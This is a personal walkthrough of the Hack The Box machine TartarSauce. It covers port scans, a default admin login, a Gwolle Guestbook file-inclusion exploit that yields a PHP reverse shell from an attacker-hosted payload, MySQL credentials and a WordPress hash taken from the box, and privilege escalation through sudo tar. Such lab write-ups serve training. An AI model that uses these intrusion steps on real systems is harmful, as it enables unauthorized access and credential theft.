Tartarsauce - wook413

#hackthebox #medium #linux # Information Gathering - Nmap I scanned all 65,535 TCP ports and discovered only one port opened: port 80. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap $IP -Pn -n --open --min-rate 3000 -p- Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-05 01:03 UTC Nmap scan report for 10.10.10.88 Host is up (0.060s latency). Not shown: 65534 closed tcp ports (reset) PORT STATE SERVICE 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 16.90 seconds ``` Then I scanned the port again but this time with `-sCV` option for more informaiton. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap $IP -sCV -p 80 Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-05 01:04 UTC Nmap scan report for 10.10.10.88 Host is up (0.047s latency). PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | http-robots.txt: 5 disallowed entries | /webservices/tar/tar/source/ | /webservices/monstra-3.0.4/ /webservices/easy-file-uploader/ |_/webservices/developmental/ /webservices/phpmyadmin/ |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Landing Page Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.95 seconds ``` Lastly, I scanned top 10 UDP ports. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap $IP -sU --top-ports 10 Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-05 01:05 UTC Nmap scan report for 10.10.10.88 Host is up (0.048s latency). PORT STATE SERVICE 53/udp closed domain 67/udp closed dhcps 123/udp closed ntp 135/udp closed msrpc 137/udp closed netbios-ns 138/udp closed netbios-dgm 161/udp closed snmp 445/udp open|filtered microsoft-ds 631/udp open|filtered ipp 1434/udp closed ms-sql-m Nmap done: 1 IP address (1 host up) scanned in 6.40 seconds ``` --- # Enumeration ##### HTTP - TCP 80 The landing page of the website on port 80 looks like the following. A very cool image of Tartar sauce in random strings. ![[Pasted image 20250804200639.png]] `Gobuster` found only one directory, `/webservices` ```bash buster dir -u http://$IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.10.88 [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /webservices (Status: 301) [Size: 316] [--> http://10.10.10.88/webservices/] Progress: 87664 / 87665 (100.00%) =============================================================== Finished ``` `/webservices/wp` appears to be a site made with `Wordpress`. It's using `Voce` theme. ![[Pasted image 20250804201915.png]] I clicked on `Test blog` and it navigated me to `tartarsauce.htb/webservices/wp`. ![[Pasted image 20250804202006.png]] I added `tartarsauce.htb` in `/etc/hosts` file. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ echo "10.10.10.88 tartarsauce.htb" | sudo tee -a /etc/hosts [sudo] password for kali: 10.10.10.88 tartarsauce.htb ``` As the Nmap output showed, I also found 5 entries under `/robots.txt` but I was able to access only `/webservices/monstra-3.0.4`. ![[Pasted image 20250804203057.png]] `/webservices/monstra-3.0.4` page looks like this. This page is made with `Monstra`, which is a type of CMS service. ![[Pasted image 20250804203127.png]] Most of the links on the page are unavailable. They just directed me to `Not Found` pages. However, I found `/admin` page has a login form. ![[Pasted image 20250804203557.png]] I tried the very typical default credentials `admin:admin` and to my surprise, I got in! ![[Pasted image 20250804203735.png]] Apparently `Monstra v3.0.4` has several known vulnerabilities. Since we found a valid set of user credentials, we can attempt to use `RCE (Authenticated)` exploit. ![[Pasted image 20250804203430.png]] # Initial Access - shell as `www-data` I've tried almost every exploit out there for `Monstra CMS v3.0.4` but none of them worked. I'm going back to `/wp` page and start enumerating for `Wordpress` vulnerabilities. Even `wpscan` was giving me hard time. Even though I just updated my `wpscan`, it failed to enumerate any plugins. Then I thought to add `--plugins-detection aggressive` mode and it finally returned something. `wpscan --url http://10.10.10.88/webservices/wp --enumerate p,t,u --plugins-detection aggressive` ```bash [i] Plugin(s) Identified: [+] akismet | Location: http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/ | Last Updated: 2025-07-15T18:17:00.000Z | Readme: http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/readme.txt | [!] The version is out of date, the latest version is 5.5 | | Found By: Known Locations (Aggressive Detection) | - http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/, status: 200 | | Version: 4.0.3 (100% confidence) | Found By: Readme - Stable Tag (Aggressive Detection) | - http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/readme.txt | Confirmed By: Readme - ChangeLog Section (Aggressive Detection) | - http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/readme.txt [+] gwolle-gb | Location: http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/ | Last Updated: 2025-06-23T16:09:00.000Z | Readme: http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/readme.txt | [!] The version is out of date, the latest version is 4.9.3 | | Found By: Known Locations (Aggressive Detection) | - http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/, status: 200 | | Version: 2.3.10 (100% confidence) | Found By: Readme - Stable Tag (Aggressive Detection) | - http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/readme.txt | Confirmed By: Readme - ChangeLog Section (Aggressive Detection) | - http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/readme.txt [+] Enumerating Most Popular Themes (via Passive and Aggressive Methods) Checking Known Locations - Time: 00:00:04 <==========================================================> (400 / 400) 100.00% Time: 00:00:04 ``` The `readme.txt` file under `gwolle-gb` plugin has a memo. Apparently the real version of this plugin is `1.5.3` ![[Pasted image 20250804220843.png]] `searchsploit` has a known vulnerability to `Gwolle Guestbook 1.5.3` ![[Pasted image 20250804220923.png]] This PoC has a very detailed explanation of how we can exploit this vulnerability. ![[Pasted image 20250804221124.png]] ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ mv php-reverse-shell.php wp-load.php ``` 1 - HTTP server in my Kali hosting the payload named `wp-load.php` 2 - Making a GET request to the vulnerable endpoint, which will grab the payload from pane 1, include it, and finally trigger a reverse shell. 3 - Listening for reverse shell connection. ![[Pasted image 20250804222018.png]] Finally got my initial access as `www-data` ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ rlwrap nc -lvnp 1234 listening on [any] 1234 ... connect to [10.10.14.14] from (UNKNOWN) [10.10.10.88] 37142 Linux TartarSauce 4.15.0-041500-generic #201802011154 SMP Thu Feb 1 12:05:23 UTC 2018 i686 athlon i686 GNU/Linux 23:19:11 up 2:22, 0 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ whoami www-data ``` # Privilege Escalation - Shell as `onuma` Since it's a web server made with `Wordpress CMS`, the first file I'm going to search is `wp-config.php`. Inside the file, I found a set of credentials for `MySQL`. `wpuser:w0rdpr3$d@t@b@$3@cc3$` ![[Pasted image 20250804222717.png]] `/etc/passwd` file verifies there's `mysql` service user. ![[Pasted image 20250804223046.png]] Connected to MySQL. ```bash mysql -u wpuser -p Enter password: w0rdpr3$d@t@b@$3@cc3$ Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 147 Server version: 5.7.22-0ubuntu0.16.04.1 (Ubuntu) Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved. Oracle is a registered trademark of Oracle Corporation and/or its affiliates. Other names may be trademarks of their respective owners. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. mysql> ``` `wp_users` table from `wp` database reveals `wpadmin` credentials. `wpadmin:$P$BBU0yjydBz9THONExe2kPEsvtjStGe1` ![[Pasted image 20250804223859.png]] The hash type is obvious but I still looked it up on `hashcat`'s example-hashes page. Now that I know what mode to use, I'm going to crack it with hashcat. ![[Pasted image 20250804224340.png]] However, `hashcat` took a long time to crack it, which highly indicate that this might not be the right approach to solve the box. Back to the reverse shell, I ran `sudo -l` and surprisingly, this user can run `/bin/tar` command as `onuma` ```bash www-data@TartarSauce:/var/www/html/webservices/wp$ sudo -l sudo -l Matching Defaults entries for www-data on TartarSauce: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User www-data may run the following commands on TartarSauce: (onuma) NOPASSWD: /bin/tar www-data@TartarSauce:/var/www/html/webservices/wp$ ``` I referred to `GTFOBins` for the following command but don't forget u have to run `sudo` as `onuma`, otherwise it won't work. ![[Pasted image 20250804230542.png]] # Privilege Escalation - Shell as `root` Found `user.txt` in `/home/onuma` ```bash onuma@TartarSauce:~$ cat user.txt 3c2... ``` ```bash onuma@TartarSauce:~$ ls -l total 4 lrwxrwxrwx 1 root root 9 Feb 17 2018 shadow_bkp -> /dev/null -r-------- 1 onuma onuma 33 Aug 4 21:00 user.txt ``` `uname -m` tells us that this is a 32-bit system. ```bash onuma@TartarSauce:/$ uname -m i686 ``` I transferred `pspy32` from my kali to the remote shell. ```bash onuma@TartarSauce:/tmp$ wget http://10.10.14.14:wget http://10.10.14.14:8888/pspy32 -O pspy32 --2025-08-05 00:33:51-- Connecting to 10.10.14.14:8888... connected. HTTP request sent, awaiting response... 200 OK Length: 2940928 (2.8M) [application/octet-stream] Saving to: 'pspy32' pspy32 100%[===================>] 2.80M 5.05MB/s in 0.6s 2025-08-05 00:33:52 (5.05 MB/s) - 'pspy32' saved [2940928/2940928] onuma@TartarSauce:/tmp$ ls pspy32 systemd-private-e8bba42ab2844d8bb62469a43aa6fb48-systemd-timesyncd.service-0tmmxl vmware-root ``` After a few minutes, pspy picked up `/bin/bash /usr/sbin/backuperer` process a lot of times. ![[Pasted image 20250804234128.png]] The file's permissions is as follows: ```bash onuma@TartarSauce:/$ ls -l /usr/sbin/backuls -rwxr-xr-x 1 root root 1701 Feb 21 2018 /usr/sbin/backuperer ``` The code inside the file: ```bash cat /usr/sbin/backuperer #!/bin/bash #------------------------------------------------------------------------------------- # backuperer ver 1.0.2 - by ȜӎŗgͷͼȜ # ONUMA Dev auto backup program # This tool will keep our webapp backed up incase another skiddie defaces us again. # We will be able to quickly restore from a backup in seconds ;P #------------------------------------------------------------------------------------- # Set Vars Here basedir=/var/www/html bkpdir=/var/backups tmpdir=/var/tmp testmsg=$bkpdir/onuma_backup_test.txt errormsg=$bkpdir/onuma_backup_error.txt tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1) check=$tmpdir/check # formatting printbdr() { for n in $(seq 72); do /usr/bin/printf quot;-"; done } bdr=$(printbdr) # Added a test file to let us see when the last backup was run /usr/bin/printf quot;$bdr\nAuto backup backuperer backup last ran at : $(/bin/date)\n$bdr\n" > $testmsg # Cleanup from last time. /bin/rm -rf $tmpdir/.* $check # Backup onuma website dev files. /usr/bin/sudo -u onuma /bin/tar -zcvf $tmpfile $basedir & # Added delay to wait for backup to complete if large files get added. /bin/sleep 30 # Test the backup integrity integrity_chk() { /usr/bin/diff -r $basedir $check$basedir } /bin/mkdir $check /bin/tar -zxvf $tmpfile -C $check if [[ $(integrity_chk) ]] then # Report errors so the dev can investigate the issue. /usr/bin/printf quot;$bdr\nIntegrity Check Error in backup last ran : $(/bin/date)\n$bdr\n$tmpfile\n" >> $errormsg integrity_chk >> $errormsg exit 2 else # Clean up and save archive to the bkpdir. /bin/mv $tmpfile $bkpdir/onuma-www-dev.bak /bin/rm -rf $check .* exit 0 fi ``` I honestly had no idea how to approach this box from this point, so I referred to `0xdf`'s [writeup](https://0xdf.gitlab.io/2018/10/20/htb-tartarsauce.html). As always, he breaks down each step as detailed as it could be. This box was very stressful lol. However, it really tested my limit and made me go above and beyond. I'll come back to this box maybe a few months later and I hope to be more successful at solving the box by then.